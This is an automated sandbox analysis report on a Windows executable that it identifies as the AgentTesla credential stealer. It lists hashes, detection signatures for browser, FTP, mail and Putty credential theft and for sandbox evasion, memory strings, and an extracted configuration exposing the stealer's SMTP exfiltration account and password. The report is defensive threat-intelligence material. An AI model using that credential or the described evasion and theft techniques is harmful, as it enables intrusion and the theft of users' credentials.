Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report BILL-OOO566876.exe

Overview

General Information

Sample Name:BILL-OOO566876.exe
Analysis ID:385473
MD5:1c84862e5b015bcecf6a194d17172dcf
SHA1:a3e0a0bda2cdef94089a6012bd025113f9fbead9
SHA256:ea29689e038f2a801066054f8ae2e3e3884127e8ac897f5467055250ce2b42f9
Tags:exe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • BILL-OOO566876.exe (PID: 1308 cmdline: 'C:\Users\user\Desktop\BILL-OOO566876.exe' MD5: 1C84862E5B015BCECF6A194D17172DCF)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "rainie.wang@syntrnomh.comTdn$AuZro1smtp.syntrnomh.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: BILL-OOO566876.exe PID: 1156JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.BILL-OOO566876.exe.40f75c0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.2.BILL-OOO566876.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                    Sigma Overview

                    No Sigma rule has matched

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "rainie.wang@syntrnomh.comTdn$AuZro1smtp.syntrnomh.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: BILL-OOO566876.exeVirustotal: Detection: 24%Perma Link
                    Source: BILL-OOO566876.exeReversingLabs: Detection: 52%
                    Machine Learning detection for sampleShow sources
                    Source: BILL-OOO566876.exeJoe Sandbox ML: detected
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: BILL-OOO566876.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: BILL-OOO566876.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: mscorrc.pdb source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmp
                    Source: global trafficTCP traffic: 192.168.2.3:49739 -> 208.91.199.225:587
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: global trafficTCP traffic: 192.168.2.3:49739 -> 208.91.199.225:587
                    Source: unknownDNS traffic detected: queries for: smtp.syntrnomh.com
                    Source: BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: BILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.476845028.0000000002F88000.00000004.00000001.sdmpString found in binary or memory: http://YdPNTdHEQXue9T.org
                    Source: BILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmpString found in binary or memory: http://YdPNTdHEQXue9T.orgl;
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: http://api.github.com/repos/
                    Source: BILL-OOO566876.exe, 00000000.00000003.203328834.00000000053D7000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpString found in binary or memory: http://hBlbMr.com
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: BILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: BILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com)
                    Source: BILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comY
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: BILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comu
                    Source: BILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: BILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: BILL-OOO566876.exe, 00000000.00000003.208525319.000000000540D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmld
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000003.208195250.000000000540D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: BILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: BILL-OOO566876.exe, 00000000.00000003.218522176.00000000053D0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: BILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comno
                    Source: BILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comx
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: BILL-OOO566876.exe, 00000000.00000003.211731693.000000000540D000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: BILL-OOO566876.exe, 00000000.00000003.202808276.00000000053EB000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: BILL-OOO566876.exe, 00000000.00000003.203388064.00000000053EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
                    Source: BILL-OOO566876.exe, 00000000.00000003.204324110.00000000053EB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comx
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://8chan.moe/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://8kun.top/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://a.4cdn.org/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://api.420chan.org/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://github.com/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://github.com/murrty/YChanEx/
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://github.com/murrty/ychanex
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://github.com/murrty/ychanex/releases/latest
                    Source: BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                    Source: BILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                    System Summary:

                    barindex
                    .NET source code contains very large array initializationsShow sources
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b386A76A6u002d42ADu002d45E1u002d9C77u002d7549EE260D53u007d/CA2BB758u002dC547u002d44ECu002dA120u002dBDF675DDAE8B.csLarge array initialization: .cctor: array initializer size 11936
                    Initial sample is a PE file and has a suspicious nameShow sources
                    Source: initial sampleStatic PE information: Filename: BILL-OOO566876.exe
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00DCB0BA NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00DCB089 NtQuerySystemInformation,
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05072950
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E989
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507ADE0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05077C48
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05078CB8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507F4B8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05070B18
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507B739
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071B70
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050797C0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05079200
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507C628
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071240
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507A6B0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507715E
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050771A8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E5D0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E5E0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050791F1
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507DDF0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05077C38
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05072878
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05070099
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050700A8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05078CA8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E0A8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050748D1
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050748E0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05074700
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05074B00
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507D330
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507D340
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071B60
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05078378
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05078388
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E7B8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05076BC2
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05079BC0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E7C8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E3D0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507E3E0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05076BF0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507DE00
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05075E11
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507C626
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05075E20
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071230
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507B24E
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05076660
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071668
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0507A671
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05076670
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05071678
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05070A80
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050736D9
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050736E8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_050746F1
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_05074AF0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE02268
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE008E0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00FC8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE008D0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00FB9
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE02480
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE01F91
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00070
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE02470
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00D40
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00D50
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 0_2_0EE00007
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00F904C0
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00F95E98
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00F9AA18
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_00F966D1
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_0112D3F8
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_01127280
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeCode function: 2_2_0112A2C8
                    Source: BILL-OOO566876.exeBinary or memory string: OriginalFilename vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: get_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: set_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: chkSaveOriginalFileNames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000002.224944328.00000000051F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMetroFramework.dll> vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000000.201469299.00000000007E2000.00000002.00020000.sdmpBinary or memory string: HttpWebRequestMethodIfModifiedSinceDownloadsget_SaveThumbnailsset_SaveThumbnailsget_SaveHTMLset_SaveHTMLget_SaveOriginalFilenamesset_SaveOriginalFilenamesget_PreventDuplicatesset_PreventDuplicatesget_DownloadPathset_DownloadPathget_ScannerDelayset_ScannerDelayget_AllowFileNamesGreaterThan255set_AllowFileNamesGreaterThan255get_fchanWarningset_fchanWarningget_UseThreadNameset_UseThreadName vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000000.201469299.00000000007E2000.00000002.00020000.sdmpBinary or memory string: SaveThumbnailsSaveHTMLSaveOriginalFilenamesPreventDuplicatesDownloadPathScannerDelayAllowFileNamesGreaterThan255fchanWarningUseThreadNameErrorLogReportWebExceptionWebExceptionWebsiteAddressReportExceptionExceptionIsWriteToFileWriteToFileBuffer vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000000.201469299.00000000007E2000.00000002.00020000.sdmpBinary or memory string: frmSettingstcMainTabControltabDownloadsTabPagenumTimerNumericUpDownlbTimerlbSavePathbtnBrowsechkMoveExistingDownloadsCheckBoxtabApplicationtabAdvancedtabResetbtnUserScriptbtnProtocolbtnSCanbtnSSavechkPreventDuplicateschkSaveOriginalFileNameschkDownloadThumbnailschkDownloadHTMLtxtSavePathchkUseFullBoardNameForTitlechkEnableUpdateschkShowExitWarningchkMinimizeToTraychkShowTrayIconttSettingsToolTipchkSaveDownloadQueueOnExitlbUserAgentchkSilenceErrorschkDisableScannerWhenOpeningSettingstxtUserAgentbtnOpenLocalFilestabRegexlbRegexInfotxtRegexlvRegexchkAllowFileNamesGreaterThan255chkMinimizeInsteadOfExitinglbRegexHintchkResetRegexSettingschkResetAdvancedSettingschkResetApplicationSettingschkResetDownloadSettingsbtnResetSettingschkEnableSettingsResetlbScanDelaySecondschkRetrieveThreadNamebtnSSave_ClickLoadSettingsSaveSettingsbtnBrowse_ClickbtnSCan_ClickbtnOpenLocalFiles_ClicklvRegex_SelectedIndexChangedtxtRegex_TextChangedchkEnableSettingsReset_CheckedChangedbtnResetSettings_Click vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000000.201469299.00000000007E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRJrtDKvhAdvpEZGtLbeHPhuoFONJcv.exe4 vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: OriginalFilename vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: get_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: set_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: chkSaveOriginalFileNames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.470196435.0000000000632000.00000002.00020000.sdmpBinary or memory string: HttpWebRequestMethodIfModifiedSinceDownloadsget_SaveThumbnailsset_SaveThumbnailsget_SaveHTMLset_SaveHTMLget_SaveOriginalFilenamesset_SaveOriginalFilenamesget_PreventDuplicatesset_PreventDuplicatesget_DownloadPathset_DownloadPathget_ScannerDelayset_ScannerDelayget_AllowFileNamesGreaterThan255set_AllowFileNamesGreaterThan255get_fchanWarningset_fchanWarningget_UseThreadNameset_UseThreadName vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.470196435.0000000000632000.00000002.00020000.sdmpBinary or memory string: SaveThumbnailsSaveHTMLSaveOriginalFilenamesPreventDuplicatesDownloadPathScannerDelayAllowFileNamesGreaterThan255fchanWarningUseThreadNameErrorLogReportWebExceptionWebExceptionWebsiteAddressReportExceptionExceptionIsWriteToFileWriteToFileBuffer vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.470196435.0000000000632000.00000002.00020000.sdmpBinary or memory string: frmSettingstcMainTabControltabDownloadsTabPagenumTimerNumericUpDownlbTimerlbSavePathbtnBrowsechkMoveExistingDownloadsCheckBoxtabApplicationtabAdvancedtabResetbtnUserScriptbtnProtocolbtnSCanbtnSSavechkPreventDuplicateschkSaveOriginalFileNameschkDownloadThumbnailschkDownloadHTMLtxtSavePathchkUseFullBoardNameForTitlechkEnableUpdateschkShowExitWarningchkMinimizeToTraychkShowTrayIconttSettingsToolTipchkSaveDownloadQueueOnExitlbUserAgentchkSilenceErrorschkDisableScannerWhenOpeningSettingstxtUserAgentbtnOpenLocalFilestabRegexlbRegexInfotxtRegexlvRegexchkAllowFileNamesGreaterThan255chkMinimizeInsteadOfExitinglbRegexHintchkResetRegexSettingschkResetAdvancedSettingschkResetApplicationSettingschkResetDownloadSettingsbtnResetSettingschkEnableSettingsResetlbScanDelaySecondschkRetrieveThreadNamebtnSSave_ClickLoadSettingsSaveSettingsbtnBrowse_ClickbtnSCan_ClickbtnOpenLocalFiles_ClicklvRegex_SelectedIndexChangedtxtRegex_TextChangedchkEnableSettingsReset_CheckedChangedbtnResetSettings_Click vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.470196435.0000000000632000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.472372681.0000000000D80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameRJrtDKvhAdvpEZGtLbeHPhuoFONJcv.exe4 vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exe, 00000002.00000002.472477668.0000000000D90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: get_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: set_SaveOriginalFilenames vs BILL-OOO566876.exe
